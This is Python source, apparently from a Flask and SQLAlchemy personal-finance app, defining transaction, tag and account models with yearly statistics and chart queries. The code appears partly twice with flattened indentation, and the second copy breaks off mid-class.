def get_statsDate(what_year):
gd = Transaction.get_dates(what_year)
fopm = first_of_prev_month.replace(year=int(gd[2]))
lopm = last_of_prev_month.replace(year=int(gd[2]))
return [str(gd[1])+'-01-01', str(gd[1])+'-12-31', str(gd[0])+'-01-01', str(gd[0])+'-12-31', str(fopm), str(lopm)]
def get_stat_year(account_id, what_year):
gd = Transaction.get_dates(what_year)
tg = Taggroup.list_tgroup_id_inSum(account_id)
q1 = db.session.query(Tag.tgr_id.label('tag1'), Taggroup.gName.label('Category'), Taggroup.gColor.label('color'), func.SUM(Transaction.amount).label('Total'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False, extract('year',Transaction.traDate)<=gd[0])\
.group_by(Tag.tgr_id, Taggroup.gName, Taggroup.gColor)\
.order_by(Tag.tgr_id).subquery()
q2 = Transaction.get_stats_year(account_id, gd[1], 'tag2', 'Prev_Year')
q3 = Transaction.get_stats_year(account_id, gd[0], 'tag3', 'This_Year')
month_count = Transaction.count_months(account_id) if Transaction.count_months(account_id) < 12 else 12
q4 = db.session.query(Tag.tgr_id.label('tag4'), func.SUM(Transaction.amount/month_count).label('Avg_Month'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Transaction.traDate>=gd[4], Transaction.traDate<gd[5])\
.group_by(Tag.tgr_id).subquery()
q5 = db.session.query(Tag.tgr_id.label('tag5'), func.SUM(Transaction.amount).label('Prev_Month'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, extract('year',Transaction.traDate)==gd[2], extract('month',Transaction.traDate)==gd[3])\
.group_by(Tag.tgr_id).subquery()
return db.session.query(q1.c.Category, q1.c.tag1, q1.c.Total, q2.c.Prev_Year, q3.c.This_Year, (100*(q3.c.This_Year/q2.c.Prev_Year)).label('%_YTD'), q4.c.Avg_Month, q5.c.Prev_Month, q1.c.color)\
.outerjoin(q2, q1.c.tag1 == q2.c.tag2)\
.outerjoin(q3, q1.c.tag1 == q3.c.tag3)\
.outerjoin(q4, q1.c.tag1 == q4.c.tag4)\
.outerjoin(q5, q1.c.tag1 == q5.c.tag5)\
.order_by(q1.c.tag1)
def get_stat_year_df(account_id, what_year):
tg = Taggroup.list_tgroup_id_inSum(account_id)
q = Transaction.get_stat_year(account_id, what_year)
df = pd.read_sql_query(q.statement, db.session.bind)
        # display float values with 2 decimal places
pd.options.display.float_format = '{:.2f}'.format
#exclude BILLS from summary
s = df.mask(~df['tag1'].isin(tg)).drop('tag1',1).sum()
#calculate '% YTD'
s.loc['%_YTD'] = 100*(s['This_Year'] / s['Prev_Year'])
#replace calculated value in specific position
df.loc[len(df)] = s
#replace summarised categ name
df = df.fillna({'Category':'Summary','tag1':0,'color':''})
#replace 'NaN' to '0', then limit decimals to 2
return df.fillna(0).round(2)
def get_stat_year_by_year(account_id):
tg = Taggroup.list_tgroup_id_inSum(account_id)
q = db.session.query( Tag.tgr_id.label('tag')\
, Taggroup.gName.label('Category')\
, Transaction.traDate.label('date')\
, Transaction.amount)\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False)\
.order_by(Tag.tgr_id)
df = pd.read_sql_query(q.statement, db.session.bind)
#add column 'year' based on 'date'
df['Year'] = pd.DatetimeIndex(df['date']).year
#groupby
df = df.groupby(['tag','Category','Year']).sum()
#pivot
df = pd.pivot_table(df, values = 'amount', index=['Category','tag'], columns = 'Year')\
.sort_values(by=['tag'], ascending=True)
#add column 'Total', to sum horizontally, per category
df.insert(loc=0, column='Total', value=df.sum(axis=1))
#add row 'Summary' to sum columns, except BILLS
df.loc['Summary'] = df.query("tag in @tg").sum()
#change FLOAT values to INT
return df.fillna(0).astype(int)
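    # Illustrative sketch of the pivot produced by get_stat_year_by_year()
    # (numbers made up): one row per category plus a 'Summary' row, one column
    # per year plus a leading horizontal 'Total' column, e.g.
    #
    # Year                Total    2019    2020
    # Category  tag
    # Food      3         -4305   -2100   -2205
    # Rent      5        -21600  -10800  -10800
    # Summary            -25905  -12900  -13005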
def chart_in_out(account_id):
sum_in = Transaction.query.with_entities(func.ABS(func.SUM(Transaction.amount)))\
.outerjoin(Tag)\
.filter(Transaction.acc_id == account_id, Transaction.amount > 0 \
, Tag.isBlnc == False \
, Transaction.traDate>=first_of_prev_month, Transaction.traDate<first_of_this_month)\
.scalar()
sum_out = Transaction.query.with_entities(func.ABS(func.SUM(Transaction.amount)))\
.outerjoin(Tag)\
.filter(Transaction.acc_id == account_id, Transaction.amount < 0 \
, Tag.isBlnc == False \
, Transaction.traDate>=first_of_prev_month, Transaction.traDate<first_of_this_month)\
.scalar()
return sum_in if sum_in is not None else 0, sum_out if sum_out is not None else 0
def chart_monthly_trend(account_id):
tag_inSum = Tag.list_tag_id_inSum(account_id)
month_by_month = db.session.query(\
func.TO_CHAR(Transaction.traDate,'YYYYMM').label('orderByCol')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth')\
,func.SUM(Transaction.amount).label('total')\
,func.TEXT('Dummy').label('D'))\
.filter(Transaction.tag_id.in_(tag_inSum), Transaction.traDate>=minus_13_months, Transaction.traDate<first_of_this_month)\
.group_by(func.TO_CHAR(Transaction.traDate,'YYYYMM'),func.TO_CHAR(Transaction.traDate,'MON'),func.TEXT('Dummy'))\
.subquery()
month_count = Transaction.count_months(account_id) if Transaction.count_months(account_id) < 13 else 13
month_avg = db.session.query(\
func.TEXT('AvgYear').label('orderByCol')\
,func.TEXT('AvgMonth').label('MON')\
,func.SUM(Transaction.amount/month_count).label('total_avg')\
,func.TEXT('Dummy').label('D'))\
.filter(Transaction.tag_id.in_(tag_inSum), Transaction.traDate>=minus_13_months, Transaction.traDate<first_of_this_month)\
.subquery()
        return db.session.query(month_by_month.c.orderByCol, month_by_month.c.mnth, month_by_month.c.total, month_avg.c.total_avg)\
            .outerjoin(month_avg, month_by_month.c.D == month_avg.c.D)\
.order_by(month_by_month.c.orderByCol)
class Taggroup(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
gName = db.Column(db.String, nullable=False)
gColor = db.Column(db.String(11), nullable=False)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<TagGroup {}>'.format(self.gName)
def insert_tag_group(g_name, color, accid):
stmt = Taggroup(gName=g_name, gColor=color, acc_id=accid)
db.session.add(stmt)
db.session.commit()
newid = stmt.id
def update_tag_group(gid, g_name, color):
stmt = Taggroup.query.filter_by(id=gid).first()
stmt.gName = g_name
stmt.gColor = color
db.session.commit()
def delete_tag_group(gid):
stmt = Taggroup.query.filter_by(id=gid).first()
db.session.delete(stmt)
db.session.commit()
def list_tgroup(account_id):
return Taggroup.query.filter(Taggroup.acc_id == account_id).order_by(Taggroup.id)
def list_tgroup_id(account_id):
q = db.session.query(Taggroup.id).filter(Taggroup.acc_id==account_id).order_by(Taggroup.id).all()
return [val for val, in q]
def list_tgroup_id_one(account_id):
return db.session.query(Taggroup.id).filter(Taggroup.acc_id==account_id).order_by(Taggroup.id.desc()).first()
def list_count(account_id):
return db.session.query(db.func.count(Taggroup.id)).filter(Taggroup.acc_id==account_id).scalar()
def list_tgroup_id_inSum(account_id):
q = db.session.query(Taggroup.id)\
.outerjoin(Tag)\
.filter(Tag.inSum==True, Taggroup.acc_id==account_id)\
.distinct()
return [val for val, in q]
class Tag(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
tName = db.Column(db.String, nullable=False)
tgr_id = db.Column(db.Integer, db.ForeignKey('taggroup.id'), nullable=False)
isBlnc = db.Column(db.Boolean, nullable=False, default=0)
inSum = db.Column(db.Boolean, nullable=False, default=1)
chart1 = db.Column(db.Boolean, nullable=False, default=0)
chart2 = db.Column(db.Boolean, nullable=False, default=0)
chart3 = db.Column(db.Boolean, nullable=False, default=0)
def __repr__(self):
return '<Tag {}>'.format(self.tName)
def insert_tag(t_name, g_id, balance, summary, c1, c2, c3):
stmt = Tag(tName=t_name, tgr_id=g_id, isBlnc=balance, inSum=summary, chart1=c1, chart2=c2, chart3=c3)
db.session.add(stmt)
db.session.commit()
def update_tag(tid, t_name, g_id, balance, summary, c1, c2, c3):
stmt = Tag.query.filter_by(id=tid).first()
stmt.tName = t_name
stmt.tgr_id = g_id
stmt.isBlnc = balance
stmt.inSum = summary
stmt.chart1 = c1
stmt.chart2 = c2
stmt.chart3 = c3
db.session.commit()
def delete_tag(tid):
stmt = Tag.query.filter_by(id=tid).first()
db.session.delete(stmt)
db.session.commit()
def list_tag(account_id):
return db.session.query(Tag.id ,Tag.tName ,Tag.tgr_id ,Tag.isBlnc ,Tag.inSum ,Tag.chart1 ,Tag.chart2 ,Tag.chart3)\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id)\
.order_by(Tag.tgr_id, Tag.id)
def list_tag_id(account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id)
return [val for val, in q]
def list_tag_id_of_group(grpid,account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Tag.tgr_id==grpid, Taggroup.acc_id==account_id)
return [val for val, in q]
def list_tag_id_inSum(account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Tag.inSum==True, Taggroup.acc_id==account_id)
return [val for val, in q]
def list_count(account_id):
return db.session.query(db.func.count(Tag.id))\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id).scalar()
class Condition(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
cName = db.Column(db.String, nullable=False)
tag_id = db.Column(db.Integer, db.ForeignKey('tag.id'), nullable=False)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<Condition {}>'.format(self.cName)
def insert_cond(cname, tag, accid):
stmt = Condition(cName=cname, tag_id=tag, acc_id=accid)
db.session.add(stmt)
db.session.commit()
def update_cond(cid, cName, tag):
stmt = Condition.query.filter_by(id=cid).first()
stmt.cName = cName
stmt.tag_id = tag
db.session.commit()
def delete_cond(cid):
stmt = Condition.query.filter_by(id=cid).first()
db.session.delete(stmt)
db.session.commit()
def list_cond(account_id):
return db.session.query(Condition.id, Condition.cName, Condition.tag_id)\
.outerjoin(Tag, Condition.tag_id == Tag.id)\
.filter(Condition.acc_id == account_id)\
.order_by(Tag.tgr_id, Condition.tag_id, Condition.id)
def list_count(account_id):
return db.session.query(db.func.count(Condition.id)).filter(Condition.acc_id==account_id).scalar()
class Description(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
descfrom = db.Column(db.String, nullable=False)
descto = db.Column(db.String, nullable=True)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
        return '<Description {}>'.format(self.descfrom)
def insert_desc(descfrom, descto, accid):
stmt = Description(descfrom=descfrom, descto=descto, acc_id=accid)
db.session.add(stmt)
db.session.commit()
def update_desc(id, descfrom, descto):
stmt = Description.query.filter_by(id=id).first()
stmt.descfrom = descfrom
stmt.descto = descto
db.session.commit()
def delete_desc(id):
stmt = Description.query.filter_by(id=id).first()
db.session.delete(stmt)
db.session.commit()
def list_desc(account_id):
return Description.query.filter(Description.acc_id == account_id).order_by(Description.descfrom)
def list_count(account_id):
return db.session.query(db.func.count(Description.id)).filter(Description.acc_id==account_id).scalar()
#create all tables based on models above
with app.app_context():
db.create_all() | app/models_postgresql.py | from datetime import datetime, timedelta
import pandas as pd
import flask
from sqlalchemy import extract, asc, desc, func, text
from app import db, app
today = datetime.today()
first_of_this_month = today.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
last_of_prev_month = first_of_this_month - timedelta(days=1)
first_of_prev_month = last_of_prev_month.replace(day=1)
minus_13_months = (first_of_this_month - timedelta(days=390)).replace(day=1)
class Account(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
accName = db.Column(db.String, unique=True, nullable=False)
#transactions = db.relationship('Transaction', backref=db.backref('trans', lazy=True))
def __repr__(self):
return '<Account {}>'.format(self.accName)
def create_one(newAccName):
stmt = Account(accName=newAccName)
db.session.add(stmt)
db.session.commit()
def one_acc(accountid):
return Account.query.filter_by(id = accountid).first()
'''def list_acc():
q1 = db.session.query(Transaction.acc_id, Transaction.amount.label('balance'), Transaction.traDate)\
.distinct(Transaction.acc_id)\
.outerjoin(Tag)\
.filter(Tag.isBlnc==True)\
.order_by(Transaction.acc_id, Transaction.traDate.desc())\
.subquery()
q2 = db.session.query(Account.id, Account.accName, func.max(func.TO_CHAR(Transaction.uplDate,'YYYY-MM-DD')).label('upldate'))\
.outerjoin(Transaction)\
.group_by(Account.id, Account.accName)\
.subquery()
return db.session.query(q2.c.id, q2.c.accName, q2.c.upldate, q1.c.balance)\
.outerjoin(q1, q2.c.id == q1.c.acc_id)'''
def list_acc():
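#latest balance per account: rank balance-tagged transactions per account by date (newest first), keep only rn == 1, then join the last upload date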
cte = db.session.query(Transaction.acc_id\
,Transaction.amount.label('balance')\
,func.row_number().over(partition_by=Transaction.acc_id, order_by=desc(Transaction.traDate)).label("rn"))\
.outerjoin(Tag)\
.filter(Tag.isBlnc==1)\
.cte()
q1 = db.session.query(cte.c.acc_id, cte.c.balance).filter(cte.c.rn == 1).subquery()
q2 = db.session.query(Account.id, Account.accName, func.max(func.date(Transaction.uplDate)).label('upldate'))\
.outerjoin(Transaction)\
.group_by(Account.id, Account.accName)\
.subquery()
return db.session.query(q2.c.id, q2.c.accName, q2.c.upldate, q1.c.balance)\
.outerjoin(q1, q2.c.id == q1.c.acc_id)
class Transaction(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
traDate = db.Column(db.Date, nullable=False)
amount = db.Column(db.Float, nullable=False)
desc = db.Column(db.String, nullable=False)
card = db.Column(db.String(1), nullable=False)
tag_id = db.Column(db.Integer, db.ForeignKey('tag.id'), nullable=True)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
uplDate = db.Column(db.DateTime, nullable=False, default=datetime.now)
confirmed = db.Column(db.Boolean, nullable=True, default=False)
def __repr__(self):
return '<Transaction {}>'.format(self.desc)
def create_one(tDate, tAmnt, tDesc, tag, acc, card, confrm):
stmt = Transaction(traDate=tDate, amount=tAmnt, desc=tDesc, card=card, tag_id=tag, acc_id=acc, confirmed=confrm)
db.session.add(stmt)
db.session.commit()
def update_trans(tid, traDate, amount, desc, tag):
stmt = Transaction.query.filter_by(id=tid).first()
stmt.traDate = traDate
stmt.amount = amount
stmt.desc = desc
stmt.tag_id = tag
stmt.confirmed = True
db.session.commit()
def update_trans_amount(tid, amount):
stmt = Transaction.query.filter_by(id=tid).first()
stmt.amount = amount
db.session.commit()
def update_desc(account_id, desc_from, desc_to):
db.session.query(Transaction)\
.filter(Transaction.desc.like('%'+ desc_from +'%'))\
.update({Transaction.desc: func.replace(Transaction.desc, desc_from, desc_to)}
,synchronize_session=False)
db.session.commit()
def delete_trans(tid):
stmt = Transaction.query.filter_by(id=tid).first()
db.session.delete(stmt)
db.session.commit()
def cnt_all(account_id):
return Transaction.query.with_entities(func.count(Transaction.id).label('cnt'))\
.filter(Transaction.acc_id == account_id).one_or_none()
def cnt_new(account_id):
return Transaction.query.with_entities(func.count(Transaction.id).label('cnt'))\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == False).one_or_none()
def cnt_avg_sum_filtered(account_id, date_from, date_to, sel_tags):
return Transaction.query\
.with_entities(func.count(Transaction.amount).label('a_cnt'), func.avg(Transaction.amount).label('a_avg'), func.sum(Transaction.amount).label('a_sum'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.tag_id.in_(sel_tags)).one_or_none()
def list_filtered(account_id, date_from, date_to, sel_tags):
return Transaction.query.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.tag_id.in_(sel_tags))\
.order_by(Transaction.traDate.desc(), Transaction.amount)
def cnt_avg_sum_filtered_new(account_id, date_from, date_to):
return Transaction.query\
.with_entities(func.count(Transaction.amount).label('a_cnt'), func.avg(Transaction.amount).label('a_avg'), func.sum(Transaction.amount).label('a_sum'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.confirmed == False).one_or_none()
def list_filtered_new(account_id, date_from, date_to):
return Transaction.query.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.confirmed == False)\
.order_by(Transaction.traDate.desc(), Transaction.amount)
def list_latest_uploads_by_card(account_id, card):
return db.session.query(Transaction.card, Transaction.desc, Transaction.traDate, Transaction.amount)\
.filter(Transaction.acc_id == account_id, Transaction.card == card)\
.order_by(Transaction.traDate.desc()).limit(3).all()
def first_date(account_id):
return db.session.query(db.func.min(Transaction.traDate)).filter(Transaction.acc_id==account_id).scalar() or today
def last_date(account_id):
return db.session.query(db.func.max(Transaction.traDate)).filter(Transaction.acc_id==account_id).scalar() or today
def count_months(account_id):
return db.session.query(func.TO_CHAR(Transaction.traDate,'YYYYMM'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate < first_of_this_month)\
.distinct().count()
def max_year(account_id):
return Transaction.query\
.with_entities(extract('year',func.max(Transaction.traDate).label('max_year')))\
.filter(Transaction.acc_id == account_id).scalar()
def list_year(account_id):
return db.session.query(extract('year',Transaction.traDate).label('year'))\
.filter(Transaction.acc_id == account_id).distinct().order_by(desc('year'))
def chart_header(column_name, account_id):
subquery = db.session.query(Tag.tgr_id).filter(getattr(Tag, column_name)==True, Taggroup.acc_id==account_id)
return db.session.query(Taggroup.gName, Taggroup.gColor)\
.filter(Taggroup.id.in_(subquery))\
.order_by(Taggroup.gName)
def chart_data(account_id, column_name, months):
first_of_n_month = (first_of_this_month - timedelta(days=months*30)).replace(day=1)
q = db.session.query(Taggroup.gName
,func.TO_CHAR(Transaction.traDate,'YYYYMM').label('orderByCol')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth')\
,func.SUM(Transaction.amount).label('total'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id\
,Transaction.confirmed == True\
,Transaction.traDate >= first_of_n_month\
,Transaction.traDate < first_of_this_month\
,getattr(Tag, column_name)==True)\
.group_by(Taggroup.gName\
,func.TO_CHAR(Transaction.traDate,'YYYYMM')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth'))\
.order_by('orderByCol',Taggroup.gName)
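#reshape the rows into {month: {group: total}} so every chart series has a value for every month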
#get unique groups
g = []
prev_val = ''
for row in q:
if row.gName != prev_val:
g.append(row.gName)
prev_val = row.gName
#create months/group with default value
m = {}
prev_val = ''
for row in q:
if row.mnth != prev_val:
m[row.mnth] = {g_:0 for g_ in g}
prev_val = row.mnth
#replace values in dict if exists in q
for row in q:
for key in m:
for mk in m[key]:
if row.mnth==key and mk==row.gName :
m[key][mk] = row.total
return m
def get_dates(what_year_):
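#returns (what_year, prev_year, which_year, which_month, start_12_month, end_12_month) used by the yearly stats queries below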
what_year = int(what_year_)
prev_year = what_year - 1
prev_month_num = last_of_prev_month.strftime("%m")
prev_month = int(prev_month_num) - 1 if int(prev_month_num) > 1 else 12
year_num = last_of_prev_month.strftime("%Y")
which_year = year_num if int(year_num) == what_year else prev_year
which_month = prev_month_num if int(year_num) == what_year else prev_month
end_12_month = last_of_prev_month.replace(year=what_year)
start_12_month = (end_12_month - timedelta(days=360)).replace(day=1)
return what_year, prev_year, which_year, which_month, start_12_month, end_12_month
def get_stats_year(account_id, what_year, lbl1, lbl2):
return db.session.query(Tag.tgr_id.label(lbl1), func.SUM(Transaction.amount).label(lbl2))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False, extract('year',Transaction.traDate)==what_year)\
.group_by(Tag.tgr_id).subquery()
def get_statsDate(what_year):
gd = Transaction.get_dates(what_year)
fopm = first_of_prev_month.replace(year=int(gd[2]))
lopm = last_of_prev_month.replace(year=int(gd[2]))
return [str(gd[1])+'-01-01', str(gd[1])+'-12-31', str(gd[0])+'-01-01', str(gd[0])+'-12-31', str(fopm), str(lopm)]
def get_stat_year(account_id, what_year):
gd = Transaction.get_dates(what_year)
tg = Taggroup.list_tgroup_id_inSum(account_id)
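#q1: running totals per category up to the selected year; q2/q3: previous/selected year; q4: monthly average over the trailing 12-month window; q5: the last closed month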
q1 = db.session.query(Tag.tgr_id.label('tag1'), Taggroup.gName.label('Category'), Taggroup.gColor.label('color'), func.SUM(Transaction.amount).label('Total'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False, extract('year',Transaction.traDate)<=gd[0])\
.group_by(Tag.tgr_id, Taggroup.gName, Taggroup.gColor)\
.order_by(Tag.tgr_id).subquery()
q2 = Transaction.get_stats_year(account_id, gd[1], 'tag2', 'Prev_Year')
q3 = Transaction.get_stats_year(account_id, gd[0], 'tag3', 'This_Year')
month_count = Transaction.count_months(account_id) if Transaction.count_months(account_id) < 12 else 12
q4 = db.session.query(Tag.tgr_id.label('tag4'), func.SUM(Transaction.amount/month_count).label('Avg_Month'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Transaction.traDate>=gd[4], Transaction.traDate<gd[5])\
.group_by(Tag.tgr_id).subquery()
q5 = db.session.query(Tag.tgr_id.label('tag5'), func.SUM(Transaction.amount).label('Prev_Month'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, extract('year',Transaction.traDate)==gd[2], extract('month',Transaction.traDate)==gd[3])\
.group_by(Tag.tgr_id).subquery()
return db.session.query(q1.c.Category, q1.c.tag1, q1.c.Total, q2.c.Prev_Year, q3.c.This_Year, (100*(q3.c.This_Year/q2.c.Prev_Year)).label('%_YTD'), q4.c.Avg_Month, q5.c.Prev_Month, q1.c.color)\
.outerjoin(q2, q1.c.tag1 == q2.c.tag2)\
.outerjoin(q3, q1.c.tag1 == q3.c.tag3)\
.outerjoin(q4, q1.c.tag1 == q4.c.tag4)\
.outerjoin(q5, q1.c.tag1 == q5.c.tag5)\
.order_by(q1.c.tag1)
def get_stat_year_df(account_id, what_year):
tg = Taggroup.list_tgroup_id_inSum(account_id)
q = Transaction.get_stat_year(account_id, what_year)
df = pd.read_sql_query(q.statement, db.session.bind)
#format float display to two decimal places
pd.options.display.float_format = '{:.2f}'.format
#exclude BILLS from summary
s = df.mask(~df['tag1'].isin(tg)).drop(columns='tag1').sum()
#calculate '% YTD'
s.loc['%_YTD'] = 100*(s['This_Year'] / s['Prev_Year'])
#replace calculated value in specific position
df.loc[len(df)] = s
#replace summarised categ name
df = df.fillna({'Category':'Summary','tag1':0,'color':''})
#replace 'NaN' to '0', then limit decimals to 2
return df.fillna(0).round(2)
def get_stat_year_by_year(account_id):
tg = Taggroup.list_tgroup_id_inSum(account_id)
q = db.session.query( Tag.tgr_id.label('tag')\
, Taggroup.gName.label('Category')\
, Transaction.traDate.label('date')\
, Transaction.amount)\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False)\
.order_by(Tag.tgr_id)
df = pd.read_sql_query(q.statement, db.session.bind)
#add column 'year' based on 'date'
df['Year'] = pd.DatetimeIndex(df['date']).year
#groupby
df = df.groupby(['tag','Category','Year']).sum()
#pivot
df = pd.pivot_table(df, values = 'amount', index=['Category','tag'], columns = 'Year')\
.sort_values(by=['tag'], ascending=True)
#add column 'Total', to sum horizontally, per category
df.insert(loc=0, column='Total', value=df.sum(axis=1))
#add row 'Summary' to sum columns, except BILLS
df.loc['Summary'] = df.query("tag in @tg").sum()
#change FLOAT values to INT
return df.fillna(0).astype(int)
def chart_in_out(account_id):
sum_in = Transaction.query.with_entities(func.ABS(func.SUM(Transaction.amount)))\
.outerjoin(Tag)\
.filter(Transaction.acc_id == account_id, Transaction.amount > 0 \
, Tag.isBlnc == False \
, Transaction.traDate>=first_of_prev_month, Transaction.traDate<first_of_this_month)\
.scalar()
sum_out = Transaction.query.with_entities(func.ABS(func.SUM(Transaction.amount)))\
.outerjoin(Tag)\
.filter(Transaction.acc_id == account_id, Transaction.amount < 0 \
, Tag.isBlnc == False \
, Transaction.traDate>=first_of_prev_month, Transaction.traDate<first_of_this_month)\
.scalar()
return sum_in if sum_in is not None else 0, sum_out if sum_out is not None else 0
def chart_monthly_trend(account_id):
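#monthly totals for the trailing 13 months (current month excluded) plus a flat monthly average, joined on a dummy column so the average repeats for every month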
tag_inSum = Tag.list_tag_id_inSum(account_id)
month_by_month = db.session.query(\
func.TO_CHAR(Transaction.traDate,'YYYYMM').label('orderByCol')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth')\
,func.SUM(Transaction.amount).label('total')\
,func.TEXT('Dummy').label('D'))\
.filter(Transaction.tag_id.in_(tag_inSum), Transaction.traDate>=minus_13_months, Transaction.traDate<first_of_this_month)\
.group_by(func.TO_CHAR(Transaction.traDate,'YYYYMM'),func.TO_CHAR(Transaction.traDate,'MON'),func.TEXT('Dummy'))\
.subquery()
month_count = Transaction.count_months(account_id) if Transaction.count_months(account_id) < 13 else 13
month_avg = db.session.query(\
func.TEXT('AvgYear').label('orderByCol')\
,func.TEXT('AvgMonth').label('MON')\
,func.SUM(Transaction.amount/month_count).label('total_avg')\
,func.TEXT('Dummy').label('D'))\
.filter(Transaction.tag_id.in_(tag_inSum), Transaction.traDate>=minus_13_months, Transaction.traDate<first_of_this_month)\
.subquery()
return db.session.query(month_by_month.c.orderByCol, month_by_month.c.mnth, month_by_month.c.total, month_avg.c.total_avg)\
.outerjoin(month_by_month, month_by_month.c.D == month_avg.c.D)\
.order_by(month_by_month.c.orderByCol)
class Taggroup(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
gName = db.Column(db.String, nullable=False)
gColor = db.Column(db.String(11), nullable=False)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<TagGroup {}>'.format(self.gName)
def insert_tag_group(g_name, color, accid):
stmt = Taggroup(gName=g_name, gColor=color, acc_id=accid)
db.session.add(stmt)
db.session.commit()
newid = stmt.id
def update_tag_group(gid, g_name, color):
stmt = Taggroup.query.filter_by(id=gid).first()
stmt.gName = g_name
stmt.gColor = color
db.session.commit()
def delete_tag_group(gid):
stmt = Taggroup.query.filter_by(id=gid).first()
db.session.delete(stmt)
db.session.commit()
def list_tgroup(account_id):
return Taggroup.query.filter(Taggroup.acc_id == account_id).order_by(Taggroup.id)
def list_tgroup_id(account_id):
q = db.session.query(Taggroup.id).filter(Taggroup.acc_id==account_id).order_by(Taggroup.id).all()
return [val for val, in q]
def list_tgroup_id_one(account_id):
return db.session.query(Taggroup.id).filter(Taggroup.acc_id==account_id).order_by(Taggroup.id.desc()).first()
def list_count(account_id):
return db.session.query(db.func.count(Taggroup.id)).filter(Taggroup.acc_id==account_id).scalar()
def list_tgroup_id_inSum(account_id):
q = db.session.query(Taggroup.id)\
.outerjoin(Tag)\
.filter(Tag.inSum==True, Taggroup.acc_id==account_id)\
.distinct()
return [val for val, in q]
class Tag(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
tName = db.Column(db.String, nullable=False)
tgr_id = db.Column(db.Integer, db.ForeignKey('taggroup.id'), nullable=False)
isBlnc = db.Column(db.Boolean, nullable=False, default=0)
inSum = db.Column(db.Boolean, nullable=False, default=1)
chart1 = db.Column(db.Boolean, nullable=False, default=0)
chart2 = db.Column(db.Boolean, nullable=False, default=0)
chart3 = db.Column(db.Boolean, nullable=False, default=0)
def __repr__(self):
return '<Tag {}>'.format(self.tName)
def insert_tag(t_name, g_id, balance, summary, c1, c2, c3):
stmt = Tag(tName=t_name, tgr_id=g_id, isBlnc=balance, inSum=summary, chart1=c1, chart2=c2, chart3=c3)
db.session.add(stmt)
db.session.commit()
def update_tag(tid, t_name, g_id, balance, summary, c1, c2, c3):
stmt = Tag.query.filter_by(id=tid).first()
stmt.tName = t_name
stmt.tgr_id = g_id
stmt.isBlnc = balance
stmt.inSum = summary
stmt.chart1 = c1
stmt.chart2 = c2
stmt.chart3 = c3
db.session.commit()
def delete_tag(tid):
stmt = Tag.query.filter_by(id=tid).first()
db.session.delete(stmt)
db.session.commit()
def list_tag(account_id):
return db.session.query(Tag.id, Tag.tName, Tag.tgr_id, Tag.isBlnc, Tag.inSum, Tag.chart1, Tag.chart2, Tag.chart3)\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id)\
.order_by(Tag.tgr_id, Tag.id)
def list_tag_id(account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id)
return [val for val, in q]
def list_tag_id_of_group(grpid,account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Tag.tgr_id==grpid, Taggroup.acc_id==account_id)
return [val for val, in q]
def list_tag_id_inSum(account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
